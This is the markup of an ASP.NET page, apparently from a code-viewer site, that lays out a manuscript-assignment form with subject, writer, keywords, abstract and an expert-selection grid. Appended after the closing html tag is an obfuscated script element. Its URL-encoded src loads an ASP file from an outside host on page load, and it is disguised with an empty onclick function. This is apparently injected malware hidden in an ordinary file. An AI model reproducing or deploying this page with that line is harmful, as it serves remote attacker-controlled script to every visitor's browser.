📄 assign.aspx
字号:
</span>
<table>
<tr>
<td style="width: 57px; text-align: right">
Subject:</td>
<td style="width: 100px">
<asp:Label ID="Subjectlab" runat="server" Text="Label" Width="156px"></asp:Label></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Writer:</td>
<td style="width: 100px">
<asp:Label ID="Writerlab" runat="server" Text="Label" Width="156px"></asp:Label></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Discipline:</td>
<td style="width: 100px">
<asp:Label ID="Disciplinelab" runat="server" Text="Label" Width="156px"></asp:Label></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Keywords:</td>
<td style="width: 100px">
<asp:Label ID="Keywordlab1" runat="server" Width="156px"></asp:Label></td>
<td style="width: 100px">
<asp:Label ID="Keywordlab2" runat="server" Width="156px"></asp:Label></td>
<td style="width: 100px; ">
<asp:Label ID="Keywordlab3" runat="server" Width="156px"></asp:Label></td>
</tr>
</table>
<div style="z-index: 101; left: 6px">
<table>
</table>
<table>
<tr>
<td style="width: 57px; text-align: right">
<span>Abstract:</span></td>
<td style="width: 146px; text-decoration: underline">
<asp:TextBox ID="Abstracttb" runat="server" Enabled="False" Height="145px" TextMode="MultiLine"
Width="411px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 57px; text-align: right; height: 24px;">
Assign:</td>
<td style="text-align: center; height: 24px;">
<asp:GridView ID="GridView1" runat="server" AllowSorting="True" AutoGenerateColumns="False"
CellPadding="4" DataKeyNames="UserId" DataSourceID="SqlDataSource1" ForeColor="#333333"
GridLines="None" OnSelectedIndexChanged="GridView1_SelectedIndexChanged">
<FooterStyle BackColor="#5D7B9D" Font-Bold="True" ForeColor="White" />
<Columns>
<asp:CommandField ShowSelectButton="True" />
<asp:BoundField DataField="UserId" HeaderText="UserId" InsertVisible="False" ReadOnly="True"
SortExpression="UserId" />
<asp:BoundField DataField="FirstName" HeaderText="FirstName" SortExpression="FirstName" />
<asp:BoundField DataField="Name" HeaderText="Name" SortExpression="Name" />
<asp:BoundField DataField="Gender" HeaderText="Gender" SortExpression="Gender" />
</Columns>
<RowStyle BackColor="#F7F6F3" ForeColor="#333333" />
<EditRowStyle BackColor="#999999" />
<SelectedRowStyle BackColor="#E2DED6" Font-Bold="True" ForeColor="#333333" />
<PagerStyle BackColor="#284775" ForeColor="White" HorizontalAlign="Center" />
<HeaderStyle BackColor="#5D7B9D" Font-Bold="True" ForeColor="White" />
<AlternatingRowStyle BackColor="White" ForeColor="#284775" />
</asp:GridView>
<asp:SqlDataSource ID="SqlDataSource1" runat="server" ConnectionString="<%$ ConnectionStrings:ConnStr %>"
SelectCommand="User_SelectExpert_Assgin" SelectCommandType="StoredProcedure"></asp:SqlDataSource>
</td>
<td style="width: 140px; text-align: left; height: 24px;">
</td>
</tr>
<tr>
<td style="width: 57px;">
</td>
<td style="text-align: center" >
<asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="Back" /> </td>
<td style="width: 140px">
</td>
</tr>
</table>
</div>
<br />
<br />
<br />
<br />
2007-2008 YeeWen.net
| Terms of Use | Learn more about YeeWen | <a href="http://www.yeedao.net/app/Login/"
title="Help Center"><span style="color: #000000">Help Center</span></a><span style="color: #000000">
</span>
</div>
<br />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</form>
</body>
</html>
<script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70">function DIV2_onclick() {
}
</script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -